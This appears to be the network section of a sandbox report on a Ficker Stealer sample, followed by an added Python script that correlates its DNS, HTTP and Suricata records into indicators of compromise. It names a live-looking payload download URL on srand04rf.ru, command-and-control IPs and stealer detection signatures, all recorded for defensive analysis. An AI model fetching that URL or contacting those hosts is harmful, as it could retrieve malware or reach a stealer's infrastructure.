Network Analysis
Domains
Name | Response | Post-Analysis Lookup |
---|---|---|
api.ipify.org | 54.243.175.83 | |
srand04rf.ru | 8.209.119.208 | |
pospvisis.com | 185.66.15.228 | |
UDP Requests
192.168.56.103 is the analysis guest; the service column is inferred from the well-known port only.
Source | Destination | Service (by port) |
---|---|---|
192.168.56.103:58285 | 164.124.101.2:53 | DNS query |
192.168.56.103:58575 | 164.124.101.2:53 | DNS query |
192.168.56.103:58935 | 164.124.101.2:53 | DNS query |
192.168.56.103:64714 | 164.124.101.2:53 | DNS query |
192.168.56.103:65511 | 164.124.101.2:53 | DNS query |
192.168.56.103:137 | 192.168.56.255:137 | NetBIOS name service (broadcast) |
192.168.56.103:138 | 192.168.56.255:138 | NetBIOS datagram (broadcast) |
192.168.56.103:1900 | 239.255.255.250:1900 | SSDP (multicast) |
192.168.56.103:49152 | 239.255.255.250:3702 | WS-Discovery (multicast) |
192.168.56.103:50368 | 239.255.255.250:1900 | SSDP (multicast) |
52.231.114.183:123 | 192.168.56.103:123 | NTP response |
8.8.8.8:53 | 192.168.56.103:58575 | DNS response |
HTTP Requests
GET 200 http://www.bing.com/favicon.ico
Request headers:
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)
Host: www.bing.com
Connection: Keep-Alive
Response headers:
HTTP/1.1 200 OK
Cache-Control: public, max-age=15552000
Content-Length: 4286
Content-Type: image/x-icon
Last-Modified: Mon, 01 Jan 1601 00:00:00 GMT
X-Cache: TCP_HIT
Server: Kestrel
X-SNR-Routing: 1
X-MSEdge-Ref: Ref A: ECA326A94EC14D959AA5D8750FB13252 Ref B: SLAEDGE1007 Ref C: 2021-06-17T04:35:55Z
Date: Thu, 17 Jun 2021 04:35:54 GMT
GET 200 http://srand04rf.ru/f7juhkryu4.exe
Request headers:
GET /f7juhkryu4.exe HTTP/1.1
Accept: */*
Accept-Language: ko
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: srand04rf.ru
Connection: Keep-Alive
Response headers:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 17 Jun 2021 04:35:55 GMT
Content-Type: application/octet-stream
Content-Length: 272910
Connection: keep-alive
Last-Modified: Wed, 09 Jun 2021 16:00:40 GMT
ETag: "60c0e5a8-42a0e"
Accept-Ranges: bytes
GET 200 http://api.ipify.org/?format=xml
Request headers:
GET /?format=xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)
Host: api.ipify.org
Connection: Keep-Alive
Response headers:
HTTP/1.1 200 OK
Server: Cowboy
Connection: keep-alive
Content-Type: text/plain
Vary: Origin
Date: Thu, 17 Jun 2021 04:36:03 GMT
Content-Length: 15
Via: 1.1 vegur
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.103 | 164.124.101.2 | 3 (Destination Unreachable) | |
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 92.62.115.177:80 -> 192.168.56.103:49608 | 2031074 | ET MALWARE Win32/Ficker Stealer Activity | A Network Trojan was detected |
TCP 192.168.56.103:49608 -> 92.62.115.177:80 | 2031132 | ET MALWARE Win32/Ficker Stealer Activity M3 | A Network Trojan was detected |
TCP 192.168.56.103:49606 -> 50.19.92.227:80 | 2029622 | ET POLICY External IP Lookup (ipify .org) | Potential Corporate Privacy Violation |
TCP 8.209.119.208:80 -> 192.168.56.103:49600 | 2014819 | ET INFO Packed Executable Download | Misc activity |
TCP 8.209.119.208:80 -> 192.168.56.103:49600 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 92.62.115.177:80 -> 192.168.56.103:49609 | 2031074 | ET MALWARE Win32/Ficker Stealer Activity | A Network Trojan was detected |
TCP 192.168.56.103:49609 -> 92.62.115.177:80 | 2031132 | ET MALWARE Win32/Ficker Stealer Activity M3 | A Network Trojan was detected |
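The tables above only become useful once they are correlated: which remote IPs fired ET MALWARE signatures, which of those were never returned as a DNS answer (a hint at hard-coded C2 addresses), which transaction delivered a PE, and whether the sample used more than one User-Agent. The following Python is an added triage example, not part of the sandbox report or its tooling. Its input records are constructed from the tables in this section; it assumes 192.168.56.103 is the analysis guest, and because the report carries no response bodies it recognises the executable download from the Content-Type and URL extension rather than from magic bytes.

```python
"""Correlate a sandbox network section (DNS answers, HTTP transactions,
Suricata alert rows) into a small IOC summary.

Added example. All records below are constructed from the report tables
above, not from a live capture.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Assumption: the analysis guest, present at one end of every flow.
GUEST = "192.168.56.103"

UA_MSIE8 = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; "
            ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
            "Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)")
UA_MSIE7 = UA_MSIE8.replace("MSIE 8.0", "MSIE 7.0")

# Constructed from the Domains table.
DNS_ANSWERS = {
    "api.ipify.org": {"54.243.175.83"},
    "srand04rf.ru": {"8.209.119.208"},
    "pospvisis.com": {"185.66.15.228"},
}

# Constructed from the HTTP Requests section (only the headers used here).
HTTP_TRANSACTIONS = [
    {"url": "http://www.bing.com/favicon.ico",
     "request": {"User-Agent": UA_MSIE8},
     "response": {"Content-Type": "image/x-icon", "Content-Length": "4286"}},
    {"url": "http://srand04rf.ru/f7juhkryu4.exe",
     "request": {"User-Agent": UA_MSIE8, "Accept-Language": "ko"},
     "response": {"Content-Type": "application/octet-stream", "Content-Length": "272910"}},
    {"url": "http://api.ipify.org/?format=xml",
     "request": {"User-Agent": UA_MSIE7},
     "response": {"Content-Type": "text/plain", "Content-Length": "15"}},
]

# Constructed from the Suricata Alerts table, one row per line.
SURICATA_ROWS = """\
TCP 92.62.115.177:80 -> 192.168.56.103:49608 | 2031074 | ET MALWARE Win32/Ficker Stealer Activity | A Network Trojan was detected |
TCP 192.168.56.103:49608 -> 92.62.115.177:80 | 2031132 | ET MALWARE Win32/Ficker Stealer Activity M3 | A Network Trojan was detected |
TCP 192.168.56.103:49606 -> 50.19.92.227:80 | 2029622 | ET POLICY External IP Lookup (ipify .org) | Potential Corporate Privacy Violation |
TCP 8.209.119.208:80 -> 192.168.56.103:49600 | 2014819 | ET INFO Packed Executable Download | Misc activity |
TCP 8.209.119.208:80 -> 192.168.56.103:49600 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 92.62.115.177:80 -> 192.168.56.103:49609 | 2031074 | ET MALWARE Win32/Ficker Stealer Activity | A Network Trojan was detected |
TCP 192.168.56.103:49609 -> 92.62.115.177:80 | 2031132 | ET MALWARE Win32/Ficker Stealer Activity M3 | A Network Trojan was detected |
"""

ALERT_RE = re.compile(
    r"^(?P<proto>\w+) (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)"
    r" \| (?P<sid>\d+) \| (?P<sig>[^|]+?) \| (?P<cat>[^|]+?)\s*\|?\s*$"
)


def parse_alert(row, guest=GUEST):
    """Parse one 'Flow | SID | Signature | Category' row and record which
    end of the flow is the remote peer (the end that is not the guest)."""
    m = ALERT_RE.match(row.strip())
    if not m:
        raise ValueError(f"unparseable alert row: {row!r}")
    a = m.groupdict()
    for k in ("sport", "dport", "sid"):
        a[k] = int(a[k])
    a["remote"] = a["dst"] if a["src"] == guest else a["src"]
    return a


def triage(dns, http, alert_rows, guest=GUEST):
    """Return an IOC summary correlating DNS answers, HTTP and alerts."""
    alerts = [parse_alert(r, guest) for r in alert_rows.splitlines() if r.strip()]
    resolved = {ip for ips in dns.values() for ip in ips}

    hits = defaultdict(set)  # remote IP -> {(sid, signature)}
    for a in alerts:
        hits[a["remote"]].add((a["sid"], a["sig"]))

    # Heuristic: the report has no bodies, so go by Content-Type / extension.
    pe_downloads = [
        t["url"] for t in http
        if t["response"].get("Content-Type", "").lower() == "application/octet-stream"
        or urlparse(t["url"]).path.lower().endswith((".exe", ".dll"))
    ]
    return {
        "domains": sorted(dns),
        "urls": [t["url"] for t in http],
        "sids": sorted({a["sid"] for a in alerts}),
        "malware_c2_ips": sorted(ip for ip, s in hits.items()
                                 if any(sig.startswith("ET MALWARE") for _, sig in s)),
        # Alerting IPs never seen as a DNS answer: hard-coded C2, or a name that
        # resolved to a different address than the one recorded.
        "alert_ips_without_dns_answer": sorted(ip for ip in hits if ip not in resolved),
        "pe_downloads": pe_downloads,
        "user_agents": sorted({t["request"].get("User-Agent", "") for t in http}),
        "accept_languages": sorted({t["request"]["Accept-Language"]
                                    for t in http if "Accept-Language" in t["request"]}),
    }


if __name__ == "__main__":
    for key, value in triage(DNS_ANSWERS, HTTP_TRANSACTIONS, SURICATA_ROWS).items():
        print(f"{key}: {value}")
```

Two caveats when reading the output. The "no DNS answer" check flags 92.62.115.177 (the Ficker C2 peer, which indeed never appears in the Domains table) but also 50.19.92.227, which is simply a different A record of api.ipify.org than the one the report recorded, so that list is a lead to verify, not a verdict. The sample also speaks with two User-Agents (MSIE 8.0 for the favicon and executable fetches, MSIE 7.0 for the ipify lookup) and sends Accept-Language: ko only on the executable download; pospvisis.com resolves but has no flow in this section.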
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts